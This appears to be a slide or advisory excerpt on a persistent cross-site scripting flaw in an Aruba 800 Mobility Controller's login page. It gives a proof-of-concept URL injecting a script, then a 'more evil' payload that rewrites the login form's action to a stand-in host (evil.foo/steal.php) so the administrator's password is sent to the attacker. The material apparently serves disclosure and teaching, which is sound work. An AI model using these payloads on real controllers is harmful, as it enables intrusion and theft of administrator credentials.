Pers. XSS on Aruba 800 Mobility Controller's login page
çHarmless PoC:
¼https://internalip:4343/screens/%22/%3E%3Cscript%3Ealert(1)%3C/script%3E
¼Payload (JS code) runs next time admin visits login page
çExample of more evil payload:
¼<script>document.formname.action="http://evil.foo/steal.php"</script>
¼Login form’s action attribute is overwritten so admin password is sent to attacker’s site when clicking on “Login”